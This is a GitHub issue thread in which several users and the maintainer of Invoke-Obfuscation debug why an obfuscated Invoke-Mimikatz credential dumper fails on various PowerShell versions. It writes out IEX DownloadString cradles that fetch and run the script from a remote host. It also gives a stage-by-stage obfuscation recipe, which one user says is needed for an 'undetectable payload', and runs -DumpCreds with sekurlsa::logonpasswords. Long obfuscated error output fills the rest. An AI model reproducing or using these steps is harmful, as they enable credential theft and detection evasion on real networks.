Comments (16)
danielbohannon
commented on September 25, 2024
Hi byt3bl33d3r, glad to hear you're like this project! Thanks for submitting this bug report. It seems that string obfuscation for ParameterSetName fields in parameter bindings (but not DefaultParameterSetName) fields are causing errors when concatenation or even -f format operator reordering is performed (even if encapsulate with curly braces as a script block). I don't recall seeing this causing errors before for PS2 through PS5, but it definitely is not working at this point.
I just pushed an updated Out-ObfuscatedTokenCommand.ps1 file (e6b01ed) that includes a string token fix as well as a variable token fix.
I am no longer seeing the above errors with Invoke-Mimikatz on either PS2 or PS5. Would you mind re-testing your scenario(s) and let me know if this resolves your issues? Curious if there is more to the errors that you're seeing.
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet
from invoke-obfuscation.
byt3bl33d3r
commented on September 25, 2024
Just re-tested, now seeing the following errors, let me know if I'm missing something.
Windows 7 (PS v2)
IEX cradle now throws a different error, running the cmdlet still errors out.
PS C:\Users\yomama> IEX (New-Object Net.Webclient).DownloadString('http://192.16
8.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Missing closing ')' in expression.
At line:1 char:4
+ IEX <<<< (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invo
ke-Mimikatz.ps1')
+ CategoryInfo : ParserError: (CloseParenToken:TokenId) [Invoke-E
xpression], ParseException
+ FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.Powe
rShell.Commands.InvokeExpressionCommand
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Import-Module .\test.ps1
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Invoke-Mimikatz
The variable '$COmmAND' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2657 char:35
+ ${E`x`EARgs} = ${COmm`AND} <<<<
+ CategoryInfo : InvalidOperation: (COmmAND:Token) [], RuntimeExc
eption
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$eXEaRgS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:173
+ &("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motESc`RIP
t`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id','Vo'
), 0, "", ${eX`Ea`RgS} <<<< )
+ CategoryInfo : InvalidOperation: (eXEaRgS:Token) [], RuntimeExc
eption
+ FullyQualifiedErrorId : VariableIsUndefined
Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2547 char:22
+ ${pEB`Y`Tes}[ <<<< 0] = 0
+ CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException
+ FullyQualifiedErrorId : IndexOutOfRange
Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2548 char:22
+ ${peBY`T`Es}[ <<<< 1] = 0
+ CategoryInfo : InvalidOperation: (1:Int32) [], RuntimeException
+ FullyQualifiedErrorId : IndexOutOfRange
inVoke-mEMORYLOaDLiBraRY : Cannot bind argument to parameter 'PeBYteS' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2552 char:94
+ ${Pel`oAdeD`iNfo} = &("{2}{3}{0}{1}{4}" -f'-Memo','ry','Invo','ke
','LoadLibrary') -PEBytes <<<< ${pe`By`TEs} -ExeArgs ${e`xeAR`gs}
+ CategoryInfo : InvalidData: (:) [inVoke-mEMORYLOaDLiBraRY], Par
ameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
owed,inVoke-mEMORYLOaDLiBraRY
The variable '$PeLOADEDiNfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2558 char:25
+ if (${PeL`O`ADEDi`Nfo} <<<< -eq ${I1`qo}::"z`eRo")
+ CategoryInfo : InvalidOperation: (PeLOADEDiNfo:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$pELoADEDinFO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2563 char:36
+ ${PE`han`Dle} = ${p`E`LoADEDinFO} <<<< [0]
+ CategoryInfo : InvalidOperation: (pELoADEDinFO:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$pELOaDediNfO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2564 char:44
+ ${Rem`O`TepEhA`NDle} = ${pE`LOaDed`i`NfO} <<<< [1]
+ CategoryInfo : InvalidOperation: (pELOaDediNfO:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:4
+ & <<<< ("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motE
Sc`RIPt`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id
','Vo'), 0, "", ${eX`Ea`RgS})
+ CategoryInfo : OperationStopped: (PEHandle is null or IntPtr.Ze
ro:String) [Invoke-Command], RuntimeException
+ FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
hell.Commands.InvokeCommandCommandWindows 8.1 (PS v4)
Seems to be the same error as last time.
PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+ ${vIR`T`UalALLOC} = (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+ ${m`E`mCPy} = ( varIabLE ("{1}{0}"-f 'Fpq','76') -va )::("{4}{5}{0}{3}{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+ ${lOAd`L`I`BRARy} = ( geT-VaRIaBLe ("76"+"fpQ") -ValueoNl )::("{6}{1}{3}{5 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+ ${V`IRTu`AlfRE`EEX} = ( geT-VARiaBLe ("{1}{0}" -f'PQ','76F') -vaL )::("{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+ ${virTUA`LP`R`oTE`CT} = ( GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+ ${cREAtET`HRE`Ad} = (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+ ${vIR`T`UalALLOC} = (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+ ${m`E`mCPy} = ( varIabLE ("{1}{0}"-f 'Fpq','76') -va )::("{4}{5}{0}{3}{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+ ${lOAd`L`I`BRARy} = ( geT-VaRIaBLe ("76"+"fpQ") -ValueoNl )::("{6}{1}{3}{5 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+ ${V`IRTu`AlfRE`EEX} = ( geT-VARiaBLe ("{1}{0}" -f'PQ','76F') -vaL )::("{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+ ${virTUA`LP`R`oTE`CT} = ( GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+ ${cREAtET`HRE`Ad} = (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
You cannot call a method on a null-valued expression.
At line:2212 char:5
+ ${P`eHAN`dLe} = ${w`in`32fun`cTions}."vIRt`Ua`LaLl`oC"."i`Nv`oKe"(${loAd`AD` ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new
PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might
be free).
At line:2224 char:4
+ Throw ("{13}{10}{18}{0}{30}{16}{14}{47}{50}{48}{4}{45}{43}{44}{12}{49}{41}{7} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (VirtualAlloc fa...might be free).:String) [], RuntimeException
+ FullyQualifiedErrorId : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running
the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the ad
dress the PE wants might be free).from invoke-obfuscation.
danielbohannon
commented on September 25, 2024
Can you provide some more information?
For the obfuscated version of Invoke-Mimikatz what obfuscation command(s) are you running? Something like this?
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet
Also, if you run a LOCAL de-obfuscated version of Invoke-Mimikatz with your default download cradle in PS2.0 then you will get the "Missing closing ')' in expression" error depending on how you downloaded Invoke-Mimikatz.
For example, if you download via .DownloadFile then you won't get this error, but if you download via .DownloadString piped to a local file then you will get this error.
Download copy of Invoke-Mimikatz to disk
$LocalFile = 'c:\users\me\mimi.ps1'
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') > $LocalFile
Invoke local copy of Invoke-Mimikatz
IEX (New-Object Net.Webclient).DownloadString($LocalFile)
Above command should error on PS2.0
So it seems that this is a PS2.0 download cradle error depending on formatting of target local file, and not an issue of obfuscation being applied to Invoke-Mimikatz script.
For the remaining issue you stated, I just need more information for how you are obfuscated Invoke-Mimikatz, and what the difference is between Invoke-Mimikatz.ps1 and .\test.ps1 in your provided examples.
Thanks for your patience. I'll try my best to get these issues hammered as soon as I can.
from invoke-obfuscation.
byt3bl33d3r
commented on September 25, 2024
Hey sorry for the late response,
Thanks for the clarification on the IEX cradle issue, will try that asap.
I ran the same invoke-obfuscation command as before
Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -QuietThere shouldn't be any difference between Invoke-Mimikatz.ps1 and test.ps1, one was obfuscated using Powershell on Linux and the other using Powershell 2.0 on Windows 7. I did that initially just to rule out the possibility of it being an issue obfuscating the script using Powershell on Linux.
Let me know if that cleared things up and if you need any more info.
from invoke-obfuscation.
newlog
commented on September 25, 2024
Hi there,
I can give you some more detail from the tests I've been carrying out.
This is my PS version for Windows 10:
[17:53:09]:[..]/trialanderror$ $PSVersionTable
Name Value
---- -----
PSVersion 5.0.10586.672
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.10586.672
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
What I've done is running each Token obfuscation stage one after the other and making sure which one failed. After my tests I can tell you that both Type and Argument stages fail. The Argument gives an error similar to what @byt3bl33d3r shows for Windows 8.1 in his last message. The Type stage simply does not finish execution (obfuscation is fine, execution of obfuscated script is not).
Here's a review of everything I did:
cd C:\Users\newlog\Documents\tools\mimikatz\powershell\Invoke-Mimikatz\custom\trialanderror
Import-Module .\<script>.ps1
Invoke-Mimikatz -DumpCreds
#
# 1.mimi_comments.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\Invoke-Mimikatz.ps1' -Command 'Token\Comment\1' -Quiet > 1.mimi_comments.ps1
#
# 2.mimi_comments_whitespace.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\mimi_comments.ps1' -Command 'Token\Whitespace\1' -Quiet > 2.mimi_comments_whitespace.ps1
#
# 3.mimi_comments_whitespace_type.ps1 (EXECUTION DOES NOT WORK - IT DOES NOT FINISH)
#
$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Type\1' -Quiet > 3.mimi_comments_whitespace_type.ps1
#
# 4.mimi_comments_whitespace_variable.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Variable\1' -Quiet > 4.mimi_comments_whitespace_variable.ps1
#
# 5.mimi_comments_whitespace_variable_member.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\4.mimi_comments_whitespace_variable.ps1 -Command 'Token\Member\1' -Quiet > 5.mimi_comments_whitespace_variable_member.ps1
#
# 6.mimi_comments_whitespace_variable_member_argument.ps1 (EXECUTION DOES NOT WORK - ERROR MESSAGE)
#
$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Argument\1' -Quiet > 6.mimi_comments_whitespace_variable_member_argument.ps1
#
# 7.mimi_comments_whitespace_variable_member_command.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Command\1' -Quiet > 7.mimi_comments_whitespace_variable_member_command.ps1
#
# 8.mimi_comments_whitespace_variable_member_command_string.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\7.mimi_comments_whitespace_variable_member_command.ps1' -Command 'Token\String\1' -Quiet > 8.mimi_comments_whitespace_variable_member_command_string.ps1
btw, the Argument stage is necessary to get an undetectable payload. Damn!
I attach the error message I get when Invoke-Mimikatz is oobfuscated with the Argument stage:
error_msg.txt
So definitively, there's something not working as expected.
Awesome work @danielbohannon It's really amazing what you did here!
from invoke-obfuscation.
danielbohannon
commented on September 25, 2024
Are you still seeing these same issues with the latest commit? I'm still not able to reproduce this issue when applying these obfuscation steps (all level 1 obfuscation for each token type as you outlined above). Not sure what variable component I'm missing here but would love to help close this issue for you guys once I can reproduce it. Thanks for your help and patience.
from invoke-obfuscation.
vivami
commented on September 25, 2024
Hi Daniel,
Thanks for this awesome project! I experience the same issue as @byt3bl33d3r. I obfuscate Invoke-Mimikatz from a Windows 10 1607 machine using your latest version 1.7 of Invoke-Obfuscation. Runs perfectly fine on the Windows 10 box:
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> Import-Module .\MimiDogz_token.ps1
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> INvoke-Mimikatz -DumpCreds
.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 153000 (00000000:000255a8)
Session : Interactive from 1
--SNIP--However, below is the output when running this same obfuscated script on a Windows Server 2012 box (PS4.0). Hope this is of use to you. Let me know if I can try anything else:
PS C:\Users\Administrator\Desktop> $PSVersionTable
Name Value
---- -----
PSVersion 4.0
WSManStackVersion 3.0
SerializationVersion 1.1.0.1
CLRVersion 4.0.30319.36366
BuildVersion 6.3.9600.17400
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion 2.2
PS C:\Users\Administrator\Desktop> Import-Module MimiDogz_token.ps1
PS C:\Users\Administrator\Desktop> INvoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+ ${m`EMCPY} = ( &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+ ${Cre`A`Te`RE`mOTEtHRE`AD} = (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+ ${m`EMCPY} = ( &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+ ${Cre`A`Te`RE`mOTEtHRE`AD} = (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
